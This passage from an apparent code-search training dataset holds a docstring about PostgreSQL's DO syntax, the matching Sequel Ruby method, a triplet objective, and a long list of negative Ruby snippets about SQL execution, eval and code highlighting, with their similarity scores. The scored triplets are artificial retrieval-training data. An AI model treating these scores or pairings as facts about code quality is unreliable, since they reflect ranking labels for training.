"0.41949332",
"0.41795617",
"0.41725886",
"0.41626713",
"0.41549644",
"0.41525912",
"0.41473264",
"0.41429833",
"0.4142794",
"0.4140519",
"0.41322833",
"0.41173232",
"0.4116002",
"0.4109779",
"0.41069752",
"0.4106234",
"0.40993768",
"0.40953338",
"0.4076184",
"0.40749967",
"0.40747947",
"0.4073264",
"0.40675482",
"0.4056791",
"0.40531603",
"0.40491274",
"0.4048724",
"0.4048499",
"0.40468004",
"0.40464306"
] |
0.77001125
|
0
|
Use PostgreSQL's DO syntax to execute an anonymous code block. The code should be the literal code string to use in the underlying procedural language. Options: :language :: The procedural language the code is written in. The PostgreSQL default is plpgsql. Can be specified as a string or a symbol.
|
def do(code, opts=OPTS)
language = opts[:language]
run "DO #{"LANGUAGE #{literal(language.to_s)} " if language}#{literal(code)}"
end
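
A minimal usage sketch for the method above, assuming DB is a Sequel PostgreSQL Database handle (the DB constant is an illustration, not part of the source):

# Runs an anonymous plpgsql block; per the interpolation above this
# emits: DO LANGUAGE 'plpgsql' 'BEGIN RAISE NOTICE ''hi''; END;'
DB.do("BEGIN RAISE NOTICE 'hi'; END;", language: :plpgsql)

# Omitting :language leaves the LANGUAGE clause off entirely, so
# PostgreSQL falls back to its default procedural language (plpgsql):
DB.do("BEGIN PERFORM pg_sleep(0); END;")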
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def block_code(code, language)\n code\n end",
"def code(lang, &block)\n source_code = capture(&block).strip\n eval('_erbout', block.binding).concat %Q(<pre class=\"CodeRay\"><code class=\"language-#{lang}\">#{html_escape source_code}</code></pre>)\nend",
"def block_code(code, language)\n if language.present?\n CodeRay.scan(code, language).div\n else\n \"<pre><code>#{code}</code></pre>\"\n end\n end",
"def block_code(code, language)\n # highlight some code with a given language lexer \n # and formatter: html or terminal256 \n # and block if you want to stream chunks\n # github.com/jayferd/rouge/blob/master/lib/rouge.rb#L17\n Rouge.highlight(code, language || 'text', 'html') \n # watch out you need to provide 'text' as a default, \n # because when you not provide language in Markdown \n # you will get error: <RuntimeError: unknown lexer >\n end",
"def inline_code; end",
"def run(code)\n eval(code, binding)\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n# execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def run_sql(sql)\n connection = PG.connect(dbname: \"facebook_lab\", host: \"localhost\")\n result = connection.exec(sql)\n connection.close\n result\nend",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def make_statement\n end",
"def make_statement\n end",
"def gql(options = {}, &block)\n unless @gql\n\n if block_given?\n @gql = Gql::Gql.new(self, &block)\n else\n @gql = Gql::Gql.new(self)\n @gql.prepare if options.fetch(:prepare, true)\n end\n @gql.sandbox_mode = options.fetch(:sandbox_mode, :sandbox)\n end\n @gql\n end",
"def run_sql(sql)\n\tdb = PG.connect(dbname: 'address_book', host: 'localhost')\n\tresult = db.exec(sql)\n\tdb.close\n\tresult\nend",
"def compile(code, force=false)\r\n raise DBGeni::NotImplemented\r\n end",
"def with_script_compiler(&block)\n in_environment do |env|\n env.with_script_compiler(&block)\n end\n end",
"def block_code(code, language)\n \n lines=code.split(\"\\n\")\n lines.map! do |line|\n\n line=line.gsub(/\\&.squo;/, \"'\")\n line=line.gsub(/\\&.dquo;/, '\"')\n line=line.gsub(/</, \"<\")\n line=line.gsub(/>/, \">\")\n\n # Adding my own special coloring scheme for comments and outputs\n # (for which I've added my own special markup sequence, -->\n line=line.gsub(/(\\# .*$)/, \"<span.ps.class='comment'>\\\\1</span>\")\n line=line.gsub(/\\=\\=> (.*$)/, \"<span.ps.class='output'>\\\\1</span>\")\n\n # Kludgy way of only replacing spaces outside the HTML tags I'm adding to get comments\n # to be in a span of their own\n line=line.gsub(/ /, \" \")\n line=line.gsub(/\\.ps\\./, \" \")\n\n if /lt;/.match(line)\n puts \">>> #{line}\"\n end\n\n line\n end\n html_inner = lines.join(\"<br/>\\n\")\n\n html=\"<div class=mycode>\\n#{html_inner}\\n</div>\\n\"\n end",
"def emit_code value\n statement :code, value\n end",
"def roby_execute(&block)\n execution_engine.execute(&block)\n end",
"def run_sql(sql)\n conn = PG.connect(dbname: \"memetube\", host: \"localhost\")\n begin\n result = conn.exec(sql)\n ensure\n conn.close\n end\n result\nend",
"def parse_lang_for_codeblock(source); end",
"def code\n str = Indentation.get\n str << \"var #{name} = function(#{@parameters.join(', ')}) {\\n\"\n Indentation.indent { str << \"#{block}\\n\" }\n str << \"#{Indentation.get}};\\n\"\n str\n end",
"def boring_parrot(statement)\n statement\nend",
"def run_sql(sql)\n conn = PG.connect(dbname: 'movies')\n result = conn.exec(sql)\n conn.close\n result\nend",
"def _run (expr)\n _ruby_eval expr\n end",
"def run_code(code)\n @output.puts # spacer\n begin\n @output.puts \" BEGIN DEBUG \".center(WIDTH, '=')\n eval(code.join(\"\\n\")) # Need to join, since +code+ is an Array.\n @output.puts \" END DEBUG \".center(WIDTH, '=')\n rescue Exception => error\n @output.puts \" DEBUG FAILED \".center(WIDTH, '=')\n @output.puts error\n end\n @output.puts # spacer\n end",
"def run_sql(sql)\n conn = PG.connect(dbname: 'goodfoodhunting')\n result = conn.exec(sql)\n conn.close\n return result\nend",
"def call(code, options = T.unsafe(nil)); end",
"def run_code(code)\n begin\n return eval(code)\n rescue\n return \"Error: Code doesn't run!\"\n end\n end",
"def block_code(code, language)\n sha = Digest::SHA1.hexdigest(code)\n Rails.cache.fetch ['code', language, sha].join('-') do\n Pygments.highlight(code, lexer:language)\n end\n end",
"def execute(&block)\n DSLHelper.new(Class => [:&, :|, :not]) do\n Kernel.load(File.join(File.dirname(__FILE__), 'dsl_ruby_extensions.rb'))\n self.instance_eval(&block)\n end\n end",
"def lambdasaurus(some_code)\n\tputs \"I am a header\"\n\tsome_code.call\n\tputs \"I am a footer\"\nend",
"def bob_code(options={}, &block)\n # if the only string is give, it must be filename by default\n if options.is_a? String\n f = options\n options = {}\n options[:filename] = f \n end\n if block_given?\n code = capture(&block)\n options[:brush] ||= :plain\n else\n unless options[:brush]\n # determine the brush from the filename\n if options[:filename]\n options[:brush] = case File.extname(options[:filename]).downcase\n when '.rb'\n :ruby\n when '.sh', '.ksh', '.csh'\n :shell\n when '.as3'\n :as3\n when '.cf'\n :cf\n when '.c#'\n :csharp\n when '.cpp', '.c'\n :cpp\n when '.css'\n :css\n when '.pas'\n :pascal\n when '.diff'\n :diff\n when '.erl'\n :elang\n when '.js'\n :javascript\n when '.java'\n :java\n when '.pl'\n :perl\n when '.php', '.php3'\n :php\n when '.txt'\n :plain\n when '.ps'\n :powershell\n when '.py', '.jy'\n :python\n when '.scala'\n :scala\n when '.sql'\n :sql\n when '.vb', '.vbs'\n :vb\n when '.xml', '.xhtml', '.xslt', '.html', '.xhtml'\n :xml\n else \n :plain # default value\n end\n end\n end\n code = raw File.read(Rails.root.join('code', options[:filename]))\n end\n s = raw \"<pre class=\\\"brush: #{options[:brush]}; highlight: #{options[:highlight_lines]}\\\">\"\n s += code\n s += raw '</pre>'\n end",
"def code; end",
"def code; end",
"def code; end",
"def code; end",
"def code; end",
"def code; end",
"def code; end",
"def as_code(text)\n '/code ' + sanitze_for_chat(text)\n end",
"def block(sexp)\n statements(sexp)\n end",
"def execute_sql(sql_code)\n done = system \"sh db_execute.sh \\\"#{sql_code}\\\"\"\n raise Exception.new(\"Issue executing sql code: #{sql_code}\") unless done\nend",
"def process(code, context)\n compiler = Verneuil::Compiler.new\n program = compiler.compile(code)\n # p program\n Verneuil::Process.new(program, context)\nend",
"def codeblock\n H[:pre, attr, H[:code, value]]\n end",
"def ruby(&block)\n @ruby_block = block\n end",
"def qux ( &block )\n yield\n return 'qux: post proc'\nend",
"def run_sql(sql)\n #connect to the|db|\n conn = PG.connect(:dbname => 'rogbloll')\n\n\n #execute the db in the argument\n res = conn.exec(sql)\n\n #now close the db\n conn.close\n\n #now return the result of the query...\n res\n\n\n \n end",
"def run_sql(sql)\n db = PG.connect(:dbname => 'movies', :host => 'localhost')\n result = db.exec(sql)\n db.close\n result\n end",
"def compile_block(scope, *exp)\n compile_do(scope, *exp[1])\n end",
"def compile_block(scope, *exp)\n compile_do(scope, *exp[1])\n end",
"def execute(opts = T.unsafe(nil), &block); end",
"def block_code(text, lang=\"\")\n lang ||= lang.to_s\n result = \"```#{lang}\\n\"\n if lang.match RUBY_LANG\n result << ColorCode::Ruby.new(text).colorize\n else\n result << ColorCode::Unknown.new(text).colorize\n end\n result << \"```\\n\"\n result\n end",
"def run(code)\n\t\t\t@interpreter.run(code)\n\t\tend",
"def execute_ruby(code)\n keywords = / class | module | def | do | while | for /\n if code =~ keywords\n return \"Unmatched ends\" if code.scan(keywords).length != code.scan(/end(\\s|$)/).length\n end\n return \"Unmatched..\" if code.scan(/\\{|\\(|\\[/).length != code.scan(/\\}|\\)|\\]/).length\n return \"Unmatched quotes..\" if code.scan(/\\\"|\\'/).length % 2 != 0\n begin\n eval(code[1..-1]) || \"nil\"\n rescue => e\n \"Fail => #{e}\"\n end\n end",
"def do_it(code)\n eval(code)\nrescue \n puts \"Cannot do it!\"\nend",
"def run_sql(sql)\n\tconn = PG.connect(dbname: \"video_store\", host: 'localhost')\n\tresult = conn.exec(sql)\n\tconn.close\n\tresult \nend",
"def code_block(str, language = nil, max_len = -1)\n if max_len > 0\n max_len -= code_block_builder('', language).length # Subtract markdown overhead\n str = str[0..max_len-1] if str.length > max_len\n end\n @result << code_block_builder(str, language)\n end",
"def compile_do_statement\n write_tag '<doStatement>'\n consume(TokenType::DO)\n compile_subroutine_call\n consume(';')\n write_tag '</doStatement>'\n end",
"def execute_in_sandbox(code)\n test_name = \"#{File.dirname(__FILE__)}/am-quoting-test.#{$$}.rb\"\n res_name = \"#{File.dirname(__FILE__)}/am-quoting-test.#{$$}.out\"\n\n File.open(test_name, \"w+\") do |file|\n file.write(<<-CODE)\n block = Proc.new do\n #{code}\n end\n puts block.call\n CODE\n end\n\n system(\"ruby #{test_name} > #{res_name}\") or raise \"could not run test in sandbox\"\n File.read(res_name).chomp\n ensure\n File.delete(test_name) rescue nil\n File.delete(res_name) rescue nil\n end",
"def call\n eval(@code)\n end",
"def run_code(code)\n codemirror_send_keys(find('#scratchpad-editor-wrapper'), code)\n find_button('__papyros-run-code-btn', disabled: false).click\n end",
"def parse_codeblock; end",
"def run_sql(sql_query)\n\tconn = PG.connect(dbname: 'first_crud_app')\n\tresult = conn.exec(sql_query)\n\tconn.close\n\tresult\nend",
"def compile()\n self._compiled = <<\"JAVASCRIPT\"\n(function(repl) {\n try {\n var rc;\n #{code.join(' ')}\n repl.rc_ok(rc);\n } catch(e) {\n repl.rc_fail(e.name, e.message ? e.message : e);\n };\n})(#{replid});\nJAVASCRIPT\n self._code = []\n end",
"def highlight(code, lang, options = T.unsafe(nil)); end",
"def run_sql(sql)\n db = PG.connect(dbname: 'goodfoodhunting')\n results = db.exec(sql)\n db.close\n results\nend",
"def exec_sql_script_in_db(db_name, db_user, db_pass, sql_script)\n # connecting to the given database\n conn = PG.connect(\n :dbname => db_name,\n :user => db_user,\n :password => db_pass)\n\n # actually executing the script\n conn.exec(sql_script)\nend",
"def statement; end",
"def highlight(code, options = T.unsafe(nil)); end",
"def sql(string)\n ::Arel::Nodes::SqlLiteral.new(string)\n end",
"def exec(connection = @connection)\n connection.exec(statement)\n end",
"def add_code(cheatsheet_db, language, type, code, comment)\n cheatsheet_db.execute(\"INSERT INTO #{language} (type, code, comment) VALUES (?, ?, ?)\", [type, code, comment])\nend",
"def run_sql_script(path, adapter = dss, ctx = {})\n sql = ErbHelper.new.process(path, ctx)\n puts sql\n adapter.run sql\n end",
"def code_start(language, caption)\n if caption.nil?\n caption_command = ''\n else\n replaced_caption = replace_inline_content(caption)\n caption_command = \"title={\\\\fontfamily{phv}\\\\selectfont\\\\textbf{#{replaced_caption}}},aboveskip=-0.4 \\\\baselineskip,\"\n end\n\n @io << @templates[:code_start].result(binding)\n end",
"def code_start(language, caption)\n\n if language == 'console'\n column_style = 'columns=fixed,'\n else\n column_style = ''\n end\n\n if caption.nil?\n caption_command = ''\n else\n caption_command = \"title={#{caption}},aboveskip=-0.4 \\\\baselineskip,\"\n end\n\n @io << @templates[:code_start].result(binding)\n end",
"def execute(&block)\n\tblock\nend",
"def execute(&block)\n\tblock\nend",
"def code_for(behavior)\n code = behavior.to_ruby\n code = code.gsub(/^proc \\{/, '')\n code = code.gsub(/\\}$/, '')\n \n # TODO_VERY_SOON: Remove spaces and junk from lines\n \n # TODO: Maybe one day switch all the {} procs \n # to do/end if they're multi-line\n \n code\n end",
"def compile_do\n create_statement\n @stack << top.add_element('doStatement')\n last_token = nil\n i = 0\n while(last_token != '(')\n type, token = get_token(i)\n top.add_element(type).text = token\n i += 1\n last_token = token\n end\n i = compile_do_expression(i)\n while(last_token != ';')\n type, token = get_token(i)\n top.add_element(type).text = token\n i += 1\n last_token = token\n end\n @token_idx += i - 1\n @stack.pop\n end",
"def ruby_code(obj); end",
"def compile_code(*jsstmts)\n code *jsstmts\n compile\n end",
"def execute(&block)\n block.call\n end",
"def execute(&block)\n block.call\n end",
"def do_compile code, do_eval=true\n\t\t\t@cf.cfp_logger.trace TRACE_ENGINE,\"Compiling #{code.fn} action #{code.action}\"\n\t\t\tbegin\n\t\t\t\t# Translate Cfruby style code into plain Ruby\n\t\t\t\ttranslator = Cfp_Translate.new(@cf,@parser)\n\t\t\t\t# Translate conditional blocks\n\t\t\t\tlines = translator.conditionals(code)\n\t\t\t\t# Line by line translation, depending on function - i.e. control, files, tidy etc.\n\t\t\t\ttranslated_lines = []\n\t\t\t\t# code.each do | line,num |\n\t\t\t\tlines.each do | line |\n\t\t\t\t\ttranslated_lines.push translator.do_translate(code.action,line)\n\t\t\t\tend\n\t\t\t\t# Encapsulate teh code into a class object\n\t\t\t\tbuf = code.encapsulate(translated_lines).join(\"\\n\")\n\t\t\t\t@cf.cfp_logger.trace TRACE_ALL,buf\n\t\t\t\teval buf if do_eval\n\t\t\trescue SyntaxError, RuntimeError\n\t\t\t\tmsg = 'ERROR cfscript ',code.fn,\" line #{code.linenum} - #{$!}\\n\"\n\t\t\t\tcode.dump\n\t\t\t\t@cf.cfp_logger.error LOG_CRIT,msg,'cfruby'\n\t\t\t\traise\n\t\t\tend\n\t\t\tbuf\n\t\tend",
"def execute(node)\n message = operation.piggyback(concern.command(database))\n node.process(message)\n end",
"def comment_code\n block_match = /\\{([^\\{\\}]*)\\}/\n matches = @code.scan(block_match)\n return if matches.size != 1\n \n block = matches[0][0].to_s\n @code.gsub!(block_match, \"{\\n#{comment_struct_list(block)}#{@indent}}\")\n end",
"def execute(sql)\n begin\n db = SQLite3::Database.new(@@db_file)\n @@_set_db_handler.call(db)\n if block_given?\n db.execute(sql) do |row|\n yield row\n end\n else\n return db.execute(sql)\n end\n ensure\n db.close\n end\n end",
"def sql_with_postgres_pgp(event)\n filter = /(pgp_sym_(encrypt|decrypt))\\(((.|\\n)*?)\\)/i\n\n event.payload[:sql] = event.payload[:sql].gsub(filter) do |_|\n \"#{$1}([FILTERED])\"\n end\n\n sql_without_postgres_pgp(event)\n end",
"def code_point; end",
"def source=(statement); end",
"def eval\n execute\n end",
"def transpile(code, options = {})\n @js_code = code\n Node.exec(generate_source(options))\n end",
"def raw_run_sql(query)\n vprint_status \"{SQLi} Executing (#{query})\"\n if @hex_encode_strings\n query = hex_encode_strings(query)\n vprint_status \"{SQLi} Encoded to (#{query})\"\n end\n @query_proc.call(query)\n end",
"def execute_code source\n source.execute(@scope)\n rescue Exception => e\n message, name = @exception_service.get_exception_message(e)\n puts \"#{name}: #{message}\"\n end",
"def exec(command, &block); end",
"def map_statements!(&ruby_block)\n @statements.map! do |stmnt|\n stmnt = ruby_block.call(stmnt)\n stmnt.parent = self unless stmnt.parent\n stmnt\n end\n end",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def highlight(code, lang, options = T.unsafe(nil), format = T.unsafe(nil)); end",
"def script(name, &block)\n add Config::Patterns::Script do |p|\n # NOTE: this is a pretty weak deprecation system. Improve it as\n # as needed.\n deprecate \"The 'script' has been deprecated. Use 'bash' instead.\"\n p.name = name\n p.code_exec = \"sh\"\n yield p if block_given?\n end\n end",
"def render_code(code)\n render_block(Pygments.highlight(code, formatter: 'terminal256', lexer: 'ruby', options: {style: 'bw'}))\nend"
] |
[
"0.6247023",
"0.5933642",
"0.5895321",
"0.5683034",
"0.56672835",
"0.5577568",
"0.5519545",
"0.5435928",
"0.54297894",
"0.5415428",
"0.5415428",
"0.5401936",
"0.5354501",
"0.5351753",
"0.5335078",
"0.5329581",
"0.53250164",
"0.530187",
"0.5296145",
"0.5272397",
"0.5240748",
"0.5238456",
"0.5236814",
"0.52355003",
"0.52274466",
"0.5224497",
"0.52169776",
"0.5213871",
"0.52077895",
"0.52012944",
"0.51960295",
"0.5188098",
"0.5182651",
"0.5182651",
"0.5182651",
"0.5182651",
"0.5182651",
"0.5182651",
"0.5182651",
"0.51810074",
"0.51684",
"0.5163857",
"0.51602304",
"0.51554",
"0.5148827",
"0.51468456",
"0.51443213",
"0.51361763",
"0.51297027",
"0.51297027",
"0.51251334",
"0.51200986",
"0.5110827",
"0.50942147",
"0.5070847",
"0.50705063",
"0.5066472",
"0.5056498",
"0.50480825",
"0.5040144",
"0.5034228",
"0.503145",
"0.5028889",
"0.5028316",
"0.5020059",
"0.5012561",
"0.5007891",
"0.49988532",
"0.49942797",
"0.49834087",
"0.49709913",
"0.49709743",
"0.49619603",
"0.49572042",
"0.49494028",
"0.49436203",
"0.49436203",
"0.49426752",
"0.4933484",
"0.49314225",
"0.49188414",
"0.49010983",
"0.49010983",
"0.48957765",
"0.4887612",
"0.48849696",
"0.48837686",
"0.48836467",
"0.4878078",
"0.48743337",
"0.4868984",
"0.48681423",
"0.48675817",
"0.48667786",
"0.48646817",
"0.4862853",
"0.4859392",
"0.4858145",
"0.48554966",
"0.48551646"
] |
0.66809785
|
0
|
Drops the function from the database. Arguments: name :: name of the function to drop opts :: options hash: :args :: The arguments for the function. See create_function_sql. :cascade :: Drop other objects depending on this function. :if_exists :: Don't raise an error if the function doesn't exist.
|
def drop_function(name, opts=OPTS)
self << drop_function_sql(name, opts)
end
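
A hedged usage sketch, again assuming a Sequel PostgreSQL Database in DB; drop_function_sql (which appears among the negatives below) appends IF EXISTS, the :args list, and CASCADE as requested:

# Drop quietly even if the function is absent, cascading to
# dependent objects:
DB.drop_function(:set_updated_at, if_exists: true, cascade: true)

# :args includes the argument types so a specific overload can be
# targeted; formatting of the list is delegated to sql_function_args:
DB.drop_function(:add, args: [:integer, :integer])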
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def drop_function(function_name, options = {})\n function_name = full_function_name(function_name, options)\n\n execute \"DROP FUNCTION #{function_name}\"\n end",
"def drop_function(name, custom_drop_statement = nil)\n Scenic.database.drop_function(name, custom_drop_statement)\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def drop_function(function_name, options)\n\n end",
"def remove_udf(udf_name, options = nil)\n policy = create_policy(options, Policy, default_info_policy)\n\n str_cmd = \"udf-remove:filename=#{udf_name};\"\n\n # Send command to one node. That node will distribute it to other nodes.\n # Send UDF to one node. That node will distribute the UDF to other nodes.\n response_map = @cluster.request_info(policy, str_cmd)\n _, response = response_map.first\n\n if response == \"ok\"\n UdfRemoveTask.new(@cluster, udf_name)\n else\n raise Aerospike::Exceptions::Aerospike.new(Aerospike::ResultCode::SERVER_ERROR, response)\n end\n end",
"def drop\n Statements::DropFunction.new(context: self)\n end",
"def remove_stored_function(function_name)\n return false unless self[SYSTEM_JS_COLLECTION].find_one({\"_id\" => function_name})\n self[SYSTEM_JS_COLLECTION].remove({\"_id\" => function_name}, :w => 1)\n end",
"def remove(name)\n if hook = by_name(name)\n hook.destroy!\n end\n end",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def remove_by_name(name)\n fw = get_by_name(name)\n if (fw != nil)\n return remove(fw)\n end \n end",
"def delete_hook(name, hook_function_name)\n @hooks[name] ||= {}\n @hooks[name].delete(hook_function_name)\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def delete(sql, name = nil)\n delete_sql(sql, name)\n end",
"def drop\n database.command(:drop => name)\n rescue Error::OperationFailure => ex\n raise ex unless ex.message =~ /ns not found/\n false\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def drop_table(table_name, **options)\n schema_cache.clear_data_source_cache!(table_name.to_s)\n execute \"DROP#{' TEMPORARY' if options[:temporary]} TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}\"\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def remove_foreign_key(table_name, *args)\n if self.adapter_name == \"PostgreSQL\" or self.adapter_name == \"MySQL\"\n options = args.extract_options!\n name = if options[:name]\n options[:name]\n else\n columns = args.first\n index_name(table_name, :column => Array(columns))\n end\n\n execute \"ALTER TABLE #{quote_table_name(table_name)} DROP FOREIGN KEY #{quote_column_name(name)}\"\n end\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def delete(sql, name = nil) end",
"def drop(name)\n tuples = primary.lookup_vals(name)\n return delete(tuples).size > 0\n end",
"def delete_sql(sql, name = nil)\n update_sql(sql, name)\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def drop_view(name, **kwargs)\n kwargs[:sqlite3] = !!(adapter_name =~ /sqlite/i)\n\n execute build_drop_view_query(name, **kwargs)\n end",
"def remove_by_name(name)\n p = get_by_name(name)\n if (p != nil)\n return remove(p)\n end \n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def drop_subscription(name, ifexists = false)\n typed_exec(\"DROP SUBSCRIPTION#{\" IF EXISTS\" if ifexists} #{connection.quote_ident(name)}\")\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def drop_event_trigger(name, options = {})\n sql = 'DROP EVENT TRIGGER '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_generic(name)\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def delete(name)\n @driver.deleteRule([name])\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def function(name, *args)\n SQL::Function.new(function_name(name), *args)\n end",
"def destroy\n @client.execute_udf(@key, @PACKAGE_NAME, 'destroy', [@bin_name], @policy)\n end",
"def remove(name)\n sudo \"rm -rf #{god_confd}/#{name}\"\n end",
"def remove\n return unless confirm_command\n\n args.each do |name|\n messages = nil\n if name.start_with? \"HEROKU_POSTGRESQL_\"\n name = name.chomp(\"_URL\").freeze\n end\n action(\"Removing #{name} on #{app}\") do\n messages = addon_run { heroku.uninstall_addon(app, name, :confirm => app) }\n end\n display(messages[:attachment]) if messages[:attachment]\n display(messages[:message]) if messages[:message]\n end\n end",
"def update_function(name, args)\n version = args[:version]\n sql_definition = args[:sql_definition]\n revert_to_version = args[:revert_to_version]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\",\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.new(\n name: name,\n version: version,\n ).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def drop_sequence(name)\n execute drop_sequence_sql(name)\n end",
"def drop_language(name, opts=OPTS)\n self << drop_language_sql(name, opts)\n end",
"def drop_sequence(*args)\n options = args.extract_options!\n args.flatten!\n\n sql = 'DROP SEQUENCE '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << Array.wrap(args).collect { |s| quote_sequence(s) }.join(', ')\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def exec_delete(sql, name, binds)\n execute(sql, name, binds)\n end",
"def delete_hook(event_name, hook_name)\n @hooks[event_name] ||= []\n deleted_callable = nil\n\n @hooks[event_name].delete_if do |current_hook_name, callable|\n if current_hook_name == hook_name\n deleted_callable = callable\n true\n else\n false\n end\n end\n deleted_callable\n end",
"def drop_sequence(sequence_name, options = {})\n SchemaMonkey::Middleware::Migration::DropSequence.start(connection: self, sequence_name: sequence_name, sequence_options: options) do |env|\n sequence_name = env.sequence_name\n options = env.sequence_options\n sql = \"DROP SEQUENCE\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(sequence_name)}\"\n execute sql\n end\n end",
"def remove_check(table_name, options)\n name = options.fetch(:name) { raise 'remove_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_column_name(name)}\n SQL\n end",
"def exec_delete(sql, name = nil, binds = []) #:nodoc:\r\n log(sql, \"delete\", binds) { query(sql, binds) }\r\n end",
"def remove!\n zombie_check\n self.class.remove(@name)\n end",
"def function(name, *args)\n SQL::Function.new(name, *args)\n end",
"def remove name\n delete(name)\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def delete(name); end",
"def delete(name); end",
"def drop_table\n db.drop_table(table_name)\n end",
